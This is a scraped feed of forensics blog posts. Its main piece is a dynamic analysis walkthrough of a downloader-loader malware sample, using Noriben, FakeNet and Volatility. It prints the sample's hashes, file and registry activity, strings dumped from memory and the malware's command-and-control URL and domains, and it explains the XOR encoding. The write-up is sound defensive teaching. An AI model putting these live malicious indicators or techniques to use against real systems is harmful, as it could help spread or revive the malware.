Beyond the standard forensic tools, there is great value in forensic examiners learning penetration testing procedures. This goes a bit beyond the 'hacking for forensic examiners' training I helped put on years ago. It's about using a better range of tools to succeed in our jobs. At the right focal point, there is a large intersection in the tasks of forensic examiners and penetration testers and there is a great benefit to trying to use a tactic from 'the other side'.  For example, I am routinely using oclHashCat with a 5GB dictionary to crack obtained user passwords from Windows and Linux/OSX systems. After all, a password is one of the best fingerprints you can get for tying multiple accounts together and attributing them to a user.

Reversing Challenges


A majority of my work is in malware analysis and reverse engineering -- two completely different jobs. The latter has many aspects that have eluded me for years, topics that just can't be learned on the job. 

The best exercise to combat these issues is in continual testing through exercises. There are numerous CrackMe, UnPackMe, and KeygenMe challenges across the internet. One notable set this year was the Microsoft Bluehat Challenge. This challenge consistent of three separate gauntlets: Vulnerability Discovery, Web Design Vulnerabilities, and Reverse Engineering. I started on the Reverse Engineering challenge, but quickly realized the burden of doing this challenge when you only have 1-2 hours of work "downtime" per week. After a month, I threw in the towel on challenges 4 and 5, wherein the former required debugging an algorithm with floating point math and the latter with reversing C++ Virtual Function Tables. Like many who just do malware analysis without much reversing, I've always just ignored the presence of vftables and focused on functionality, so this was a huge gut punch that stopped me in my tracks.

Industry Conferences


After a long conference circuit in 2011, I took it easy in 2012, and planned to as well in 2013. As conferences and training are out of pocket, and since I had just bought a home, I had no expectations of traveling this year.

However, I was able to attend the first-ever BSidesNOLA in New Orleans. While there was a great mixture of topics and speakers, there was a heavier component of forensics and incident response than in most other conferences. Ran by an extremely talented group of foodies, even the chosen taco food truck obliterated my expectations. I'll be looking to return in 2014, if I can secure enough funding.

I also had the pleasure of attending the Open Source Digital Forensics Conference (OSDFC), put on by Basis Tech. I had attended only once prior and found it a great mixing bowl of academia and practitioners. Where most of the core open source developers drink whisky alongside forensic examiners and discuss techniques.

The OSDFC was heralded in by the Open Memory Forensic Workshop (OMFW) put on by the core developers of Volatility. After a jam-packed series of technical talks given at the rate of a machine gun, the only emotion I could come to was... humbled. Here are the folks who are utterly conquering a new battlefield of forensics. And that was my opinion after having already done basic memory forensics for a few years.

On request, I put together a new talk this year on Introducing Intelligence into your Malware Analysis (video link).  I first gave it to the CyberGamut group, and carried it on to the inaugural BSidesDC and then BSidesDE (Delaware). The talk was targeted towards malware analysts in smaller organizations who are facing an uphill battle of malware and attacks. Using the currently accepted Cyber Kill Chain model, the talk broke down a typical malware analysis into phases that can be acted upon immediately, delegated, or stored for later processing. Given the right structure and intelligence, an analyst should be able to get actionable intel back from a malware sample within minutes, not hours, but focusing on the core indicators. This means putting reversing a custom encryption routine on the back burner and get the components to build rules for file system and network monitoring.

On notable point about 2013 was the lack of conferences I attended, as well. Due to buying a house, and since conferences are out of pocket for me, I had to turn down attending (and speaking at) a handful of conferences this year. Notably, DEFCON, BSidesLV, and DerbyCon. DerbyCon will always remain one of my favorites, and I was sad to miss it for the first time, but my fingers are crossed for next year.

Goals and Efforts for 2014

To keep myself honest, here are some of my ideas of things to continue or improve upon for 2014:

  • I will continue development on Noriben. It's currently undergoing a massive rewrite that will eventually allow it to automatically request VirusTotal results and transmit dropped files, given a legitimate public API key. More features will be implemented as requested.  Have an idea? Let me know!
  • I will continue to crack away at the Microsoft BlueHat Challenges. Being literally stuck on the RE samples, I suspect continued progress will result from a dream-induced epiphany, but I'll take anything I can get.
  • I will attempt the Matasano Cryptography challenges. Crypto plays a large part of the malware analysis field, with one-time cipher pads and iterative variants of RC4 popping up every week. I haven't attempted these challenges, but plan to once a sizable amount of free time appears (hah!).
  • I will improve my programming abilities, which starts with creating more class-based Python code, and fostered by participation in challenges like Matasano's. 
  • I will strive to get better at reversing, well.. everything. Working in a reverse engineering environment where samples switching between C, C++, Delphi, and .NET on a regular basis, I know that I need to improve at the intricacies of these individual languages. 

Ghetto Forensics!

$
0
0
While I have maintained a blog on my personal website (www.thebaskins.com) for many years, the process of creating new posts on it has become cumbersome over time. As I perform more technical posts, they felt out of place on a personal site. After some weeks of contemplation, I've forked my site to place my new technical content on a site for itself, here, at Ghetto Forensics.

Why Ghetto Forensics? Because this is the world in which we operate in. For every security team operating under a virtual unlimited budget, there are a hundred that are cobbling together a team on a shoestring budget using whatever tools they can. This is the world I've become used to in my long career in security, where knowledgeable defenders make do as virtual MacGyvers: facing tough problems with a stick of bubble gum,  a paperclip, and some Python code.

Many don't even realize they're in such a position. They've created an environment where they are continually on the ball and solving problems, until they are invited to a vendor demonstration where a $10,000 tool is being pitched that does exactly what their custom script already performs. Where an encrypted file volume isn't met with price quotes, but ideas such as "What if we just ran `strings` on the entire hard drive and try each as a password?".

Ghetto forensics involves using whatever is at your disposal to get through the day. Ghetto examiners don't have the luxury of spending money to solve a case, or buying new and elaborate tools. Instead, their focus is to survive the day as cheaply and efficiently as possible.

Have a tough problem? No EnScript available? Then work through five different, free tools, outputting the results from one to another, until you receive data that meets your demands. Stay on top of the tools, constantly reading blog posts and twitter feeds of others, to see what is currently available. Instead of swishing coffee in a mug while waiting for keyword indexing, having the luxury of weeks to perform an examination, you are multitasking and updating your procedures to go directly after the data that's relevant to answering the questions. Fix your environment so that you can foresee and tackle that mountain of looming threats instead of constantly being responsive to incidents months after the fact.

These are many of the ideals I've learned from and taught others. While others adopted the mentality of posting questions to vendors and waiting for a response, we've learned to bypass corporate products and blaze our own trails. When I helped develop a Linux Intrusions class in 2002, the goal was to teach how to investigate a fully-fledged network intrusion on their zero-dollar budgets. We used Sleuthkit, and Autopsy, and OpenOffice. We created custom timelines and used free spreadsheet (Quattro) to perform filtering and color-coding. Students learned how to take large amounts of data and quickly cull it down to notable entries using grep, awk, and sed. And, when they returned to their home offices, they were running in circles around their co-workers who relied upon commercial, GUI applications. Their task became one of not finding which button to click on, but what data do I need and how do I extract it.

Join me as we celebrate Ghetto Forensics, where being a Ghetto Examiner is a measure of your ingenuity and endurance in a world where you can't even expense parking.

Malware with No Strings Attached - Dynamic Analysis

$
0
0
I had the honor of lecturing for Champlain College's graduate level Malware Analysis course this week. One of the aspects of the lecture was showing off dynamic analysis with my Noriben script and some of the indicators I would look for when running malware.

While every malware site under the sun can tell you how to do malware dynamic analysis, I wanted to write a post on how I, personally, perform dynamic analysis. Some of the things I look for, some things I've learned to ignore, and how to go a little bit above and beyond to answer unusual questions. And, if the questions can't be answered, how to obtain good clues that could help you or another analyst understand the data down the road.

Additionally. I've been meaning to write up a malware analysis post for awhile, but haven't really found any malware that's been really interesting enough. Most were overly complex, many overly simple, and most just too boring to write on. Going back through prior incidents, I remembered a large scale response we worked involving a CoreFlood compromise. While this post won't be on the same malware, it's from a similar variant:

MD5: 4f45df18209b840a2cf4de91501847d1
SSDEEP: 768:ofATWbDPImK/fJQTR5WSgRlo5naTKczgYtWc5bCQHg:uk6chnWESgRKcnWc5uF
Size: 48640 bytes

This is not a ground-breaking malware sample. The techniques here are not new. I want to simply show a typical workflow of analyzing malware and overcoming the challenges that appear in doing so.

There are multiple levels of complexity to this sample, too much for a single post, including ways in which it encrypts embedded data and strings. Therefore, this post will focus on the dynamic artifacts of running the malware and examining the files left behind. On the next post, we'll use IDA Pro to dig deeper into reversing the logic used by the malware.



The analysis in this post will cover analysing malware challenges from various angles. While it discusses the processes of basic dynamic analysis, the emphasis is on seeing malware analysis as a series of logic puzzles. Instead of just running tools, we'll cover various methods to solve these challenges.

I invite any opinions or suggestions on other procedures that could be used to analyze this data. It's how we all learn.

Let's first explore the sample file itself at a basic static level, first. At the advice of my friend and former colleague, Brian Moran (of Bri Mor Labs), I've adapted the use of PeStudio:




PeStudio noted 167 Unclassified strings which could also be obtained via SysInternals Strings. Extracting these strings, and removing basic API calls, shows:

3etProcAddr
Control Panel\Accessibility\TimeOut
TimeToWait
\system32\winnls.dll
kernel32.dll
RegOpenKeyExA
advapi32.dll
MlLrqtuhA3x0WmjwNM27

I left these specific API and library calls here for a reason (explained in the next post). I'll let you form your own opinion of the severity of these strings. Manual analysis of the executable to find these strings shows that they were at the end of the .rsrc (Resource) section. 

Runtime Analysis


I'll start by configuring a VM with basic runtime tools: FakeNet, Capture-BAT, Procmon, and Noriben. I launch the malware executable and then sit back. After a few seconds I see web traffic appear in FakeNet, so I stop the monitoring and review the results.

After doing some light cleaning of the Noriben results, removing items that are not relevant and duplicate items, I see the following results:

Processes Created:
==================
[CreateProcess] Explorer.EXE:1596 > "%UserProfile%\Desktop\malware.exe"[Child PID: 1548]

File Activity:
==================
[CreateFile] malware.exe:1548 > %AppData%\Adobe\shed\thr1.chm[MD5: e26316552f1b9cbc4943d22bc3d35adc]
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\History
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5
[CreateFile] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat[MD5: e736f02e53e55d0869c6ae90c9c8bf00]
[CreateFolder] malware.exe:1548 > %UserProfile%\Cookies
[CreateFile] malware.exe:1548 > %UserProfile%\Cookies\index.dat[MD5: d7a950fefd60dbaa01df2d85fefb3862]
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\SG0UEJSI\showthread[1].htm[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFolder] malware.exe:1548 > %AppData%\Adobe\plugs
[RenameFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe => %AppData%\Adobe\plugs\mmc61753109.txt
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 8c4840ab4f47b1b563ce850b12d3c0db]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]

Registry Activity:
==================
[RegCreateKey] malware.exe:1548 > HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[RegCreateKey] malware.exe:1548 > HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings
[RegSetValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy  =  1
[RegCreateKey] malware.exe:1548 > HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
[RegSetValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable  =  0
[RegDeleteValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
[RegDeleteValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
[RegCreateKey] malware.exe:1548 > HKLM\Software\Microsoft\DownloadManager

There are a few things that pop out at me upon reviewing this. Mostly, there's only one active file in play, our malware.exe. While it creates other files, these dropped files are call executed nor entrenched as additional executable components. That means all functionality that we need is in our malware.exe... does the brevity of those Strings above concern you more now?

I see the tell-tale signs of the malware using Internet Explorer API calls to make HTTP connections. The downloaded file of showthread[1].htm shows an attempt to go out to the internet and download a file. 

I see a dropped file to %AppData%\Adobe\shed\thr1.chm with an MD5 value that is not duplicated elsewhere.

I also see multiple writes to a file of %AppData%\Adobe\plugs\mmc109.exe. While all of these files have the same MD5 value, this is not something you can trust; those MD5s are assigned by Noriben after runtime. So, the content could have changed between each write. There were actually dozens of continual writes to that same file, many of which were removed here for brevity. Could this be a keylog file?

But, why does this file almost always end up with the same hash value as the downloaded file, showthread[1].htm, except for one instance where it has another unique hash value?

And why is not a single file deleted?

Curiouser and Curiouser.

Registry analysis shows little that pops out. The HKCU\...\Internet Settings keys are written normally whenever Internet Explorer is launched benignly. Unless there's something later to tell me these were used directly by the malware, I'll ignore them as background noise associated with an action performed by the malware (downloading a file).

Let's switch gears to the FakeNet network capture output, stored as a PCAP file. Opening this file in WireShark I see two DNS requests: adobe.com and presentpie.vv.cc. Following TCP traffic, I then see HTTP requests going to each of these respective domains:

adobe.com:




presentpie.vv.cc:



You'll note that all of the HTTP GET requests are for the same URI, containing "t=332864" which is a bit of an oddity. If you have the ability to create a random number to put in this field, why not do so?

At this point, there are a few things that we need to determine:
  • What is the purpose of that %AppData%\Adobe\shed\thr1.chm file?
  • Is the contents of showthread[1].htm what FakeNet would send?
  • Why is %AppData%\Adobe\plugs\mmc109.exe almost always the same hash value as showthread[1].htm?
  • Why was mmc109.exe renamed to mmc61753109.txt?
This is the point where most automated analysis tools, and many analysts, stop. But, there's a whole cornucopia of cool stuff left undiscovered.


Level 2 (Digging Deeper)


Opening thr1.chm up in a hex viewer shows very interesting contents:



At only 49 bytes, and only written at initial runtime, my first thought is that this is configuration data used by the malware. The data is obviously not Base64 encoded, so maybe a basic XOR routine? I see little patterns, no repeated sequential characters, and very few repeated bytes, so likely not a single-byte XOR. We'll need to do static analysis to figure out the structure and purpose of this file completely

Second, let's view the showthread[1].htm file. A quick visual scan shows that it's a standard FakeNet HTML page:

<p class=MsoNormal>This is the help file for <span class=SpellE>FakeNet</span>
version 1.0.<span style='mso-spacerun:yes'>  </span>This program must be run
with administrator privileges. <span style='mso-spacerun:yes'> </span>If you
like this tool and are interested in malware analysis, please consider
purchasing Practical Malware Analysis from No Starch Press.<span
style='mso-spacerun:yes'>  </span>It contains lots of great information to help
you become a skilled malware analyst.</p>

Running an MD5 hash of this value gives 1e3ab8a8a419459fb8c169c08ea62fcf, the same value we see repeated in our Noriben results. This makes a bit of sense. The malware is requesting a file named showthread[1].htm from some remote site, expecting it to be a legitimate, un-encrypted executable, and copies it to %AppData%\Adobe\plugs\mmc109.exe. This downloaded file is very likely a second-stage trojan.

But, why does mmc109.exe sometimes have a different hash value? Upon ending my runtime, the file had the 8c4840ab4f47b1b563ce850b12d3c0db hash value. Opening it in a hex editor shows a possible answer:



This file is encrypted. The style looks similar to that seen in thr1.chm, and its very likely that the same encrypted/decryption routine was used for both files.

This suggests that the malware sample downloads a file, encrypts it, and saves it to mmc109.exe. The hash varies possibly because the malware routinely decrypts it for execution, then re-encrypts it afterward. Maybe we saw no additional processes created because it wasn't a valid executable? Can we test this? Absolutely! Instead of using the FakeNet fake HTML page, replace it with calc.exe and re-run the malware:

Processes Created:
==================
[CreateProcess] Explorer.EXE:1596 > "%UserProfile%\Desktop\malware.exe"[Child PID: 2000]
[CreateProcess] malware.exe:2000 > "%AppData%\Adobe\plugs\mmc188.exe"[Child PID: 856]
[CreateProcess] malware.exe:2000 > "%AppData%\Adobe\plugs\mmc188.exe"[Child PID: 444]

Upon running the malware, the Windows calculator opens. And opens again... and again. Additionally, we also now know that the three digit number after 'mmc' varies per runtime.

The last question was to find the purpose of the mmc61753109.txt file. We see the malware rename mmc109.exe to this file, then create another mmc109.exe. The mmc61753109.txt file had the same MD5 hash value of 8c4840ab4f47b1b563ce850b12d3c0db, and a quick look in the hex editor shows that it's the encrypted version of the downloaded file. Maybe it's a backup of the second-stage malware?

From this level of analysis we now know what the showthread[1].htm file is and it is copied to mmc109.exe, but we're left with a few more questions:
  • What is the encryption routine used for thr1.chm and mmc109.exe?
  • Why does the malware rename mmc109.exe to mmc61753109.txt?
  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
  • Why is none of this functionality apparent based on the strings extracted from the malware?
Some of these can only be solved via static analysis. Some analysts would likely stop at this point, noting these questions for future analysis. 

We won't :)

Level 3 (Memory Analysis)


The big question is how much of these questions can we answer based on dynamic analysis, and which require us to use a tool like IDA Pro or Hopper to reverse the malware in static analysis, or at least a Debugger to step through the malware's operation?

We can take an initial stab at the encryption routine, but it won't be as effective as a static analysis. To do this, we have to define the constants and the variables in the encryption routine. We have a known decrypted set of data (the FakeNet HTML output), and a known encrypted version of the file. If you run the malware again, you'll find the encrypted results are identical, suggesting that there's no random seed used in the encryption, or that the data is simply encoded.

Encoding versus Encryption is splitting hairs on routines. Typically if data is transformed via a simple byte-by-byte operation (add, subtract, XOR), we consider it encoding. If data is transformed via a cipher pad, key scheduler, or similar routines, then we consider it encryption. For the sake of this post, we'll consider everything encryption until we know better.

We can also try and determine if the encryption routine is stream-based or block-based. Take the original FakeNet document and leave the first 16-bytes intact. Modify the 16-bytes following those to a series of all the same character. Re-run the malware and analyze the encrypted results. You'll find the first encrypted first 16 bytes remain the same, while the modified 16-bytes have changed... and the remainder of the file is identical to the first run. You can then repeat this by changing a single byte in the first 16-bytes, from the end to the beginning, and seeing how much of the encrypted text changes. You'll basically be narrowing the size of your encryption window over time until you see how large it is.

This is a long process, but it will eventually tell you that data is encrypted 4-bytes (DWORD) at a time. It's also something we could have determined with static analysis in just 30 seconds :)

As far as the strings, we'll need to shift our focus to memory analysis with Volatility:

> v.py -f XP_VM.vmem pslist
Volatile Systems Volatility Framework 2.3_beta
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ -----
0x829c8830 System                    4      0     56     2290 ------      0
0x820ab1f8 malware.exe            1548   1596      6     3255      0      0 2014-02-08 17:06:10 UTC+0000

With the malware PID found, let's dump the executable from memory space. During runtime, malware may decode data in-place from within its own data. If so, the latest version of the executable from RAM will contain the same code but decoded strings. To do this, we'll use Volatility's procexedump to carve out the usable executable space from memory. Alternatively, procmemdump can be used to do the same, but with the inclusion of slack space within the memory heaps.

E:\VMs\XP_VM>v.py -f XP_VM.vmem procexedump -p 1548 -D .
Volatile Systems Volatility Framework 2.3_beta
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x820ab1f8 0x00400000 malware.exe          OK: executable.1548.exe

With this file dumped, I'll do a quick strings/grep to see if it contains any of the static indicators I saw in Noriben's output:

> strings executable.1548.exe | grep -E -i "presentpie|mmc|shed"
shed
shedexec:thr1:
\shed
mmc
delshed
mmc_install
delshedexec
shedexec
shedscr:3:120 http://presentpie.vv.cc/showthread.php?t=332864

Now we're cooking with fire. Dumping strings from this new executable gives us:

id=
solutions.html
oodmansof
ansoft
shed
scr:
ZZZZ
shedexec:thr1:
ZZZ
Hui
Member Window
\Ad
obe
\shed
.cer
 .e
\msh
.ex
err.log
SystemDrive
POST /
 HTTP/1.1
Host: 
User-Agent: Opera/10.80 Pesto/2.2.30
Content-Type: application/x-www-form-urlencoded
Content-Length: 
User-Agent: Opera/10.60 Presto/2.2.30
mmc
.txt
.exe
open
delshed
exec:thr1
htt
t\*.*
.chm
mmc_install
runas
.dll
delshedexec
shedexec
downadminexec
xec2
User-Agent: Opera/10.60 Presto/2.2.30
ABCDEFG
local
explorer.exe
accuratefiles.com
elsoplongt.com
et-treska.com
lulango.com
shedscr:3:120 http://presentpie.vv.cc/showthread.php?t=332864

Much better! 

Based on this level of analysis, we now know a lot more about the malware. We have a very good notion that the initial malware.exe was a loader that decrypted an internal executable and injected it into memory. We also know that the injected executable is responsible for network connections.

However, what happened to the original strings we pulled out? They're not in the new display! And can we figure anything else out about the encryption? We're going to need to up our game a bit to see what's going on.

Level 4 (Visual Analysis)


The original executable was 48640 bytes. What we pulled from memory was 34304 bytes. There are 14336 (0x3800) bytes unaccounted for. The process we pulled out of memory could be a second executable injected by the malware, in which case the original strings from the loader were cast off in memory like a snake shedding its skin.

Scratching my head a bit, I take the original malware executable and just page through it with a hex editor, comparing sections side-by-side with the extracted executable. If you've ever taken any of my malware analysis training, I emphasize the power of the human eye to detect patterns better than any software. This proves to be the case here.



Notice the similarities? The extracted file from Volatility is a series of PADDINGXX, which is STANDARD and BENIGN for executables with resources. (I've read way too many analysis reports that called this out as an indicator). Look at the encrypted file and you'll see a series of ..DD...X repeating in a pattern. Comparing bytes above and below also show series of two-byte segments that are the same. Interesting. Could be an encoding routine that skips certain bytes, or a multi-byte XOR with null characters in the key. Wherever there's a null byte in an XOR key, the original data will remain, so this could be the case.

This overlap was, roughly, at the 95% of the decrypted file and the 80% mark of the encrypted file, which further suggests that remaining data in the original file was a shell used to inject an executable. Once launched, and extracted by Volatility, all we recovered was the injected portion.

Scrolling up through the decrypted file, I see a block of configuration data jump out at me. Scrolling up to roughly the same point in the original file, I see what could be its encrypted values:


There may be a few bytes off between the samples, as is the case here (such as the row of 0x01's in the encrypted version), but your eye should adjust for these and see the data around it.

Of note is the large block of null data below the value on the decrypted side. If there's an encryption key through an XOR operation, you'll typically see it on the encrypted side wherever there's a null block on the decrypted. And here, we see a pattern of 0x0000BC85 over and over, which could be a 4-byte XOR key.

Based on this, we have a fair idea that the malware contains an encrypted executable, which is injected on runtime. This injection contains a configuration block containing multiple domain names, some not seen during runtime. We also have good evidence that the encoding was done via a 4-byte XOR key of 0x0000BC85 (or 0xBC850000, or 0x850000BC, or 0x00BC8500). 

Conclusion

Dynamically analyzing malware is a varied art and science. Most of the industry is worried about the high level indicators, shown in the first portion of this analysis. However, this often leaves behind more questions than it answers. There are a lot of very important items that we would have completely missed had we not dug deeper. 

The art of analysis is not just from being able to look at activity and understanding it. It comes from being able to see a logical problem in front of you and understanding how to overcome the challenge. Each sample is different, each challenge is unique, and techniques that work for this malware will be useless on the next. 

That's the joy of malware analysis.


Stay tuned for Part 2: Static Analysis (a.k.a. Brian procrastinating his book writing). There, we'll use IDA Pro (or Hopper) to find encrypted strings, work out the loader logic, figure out why and how it's dropping files, and see what other fun things the malware does.



Updates:
11 Feb 14 - Fixed one hash, reworded encoding segments, thanks to feedback from Mark Heidrick 
Viewing all 52 articles
Browse latest View live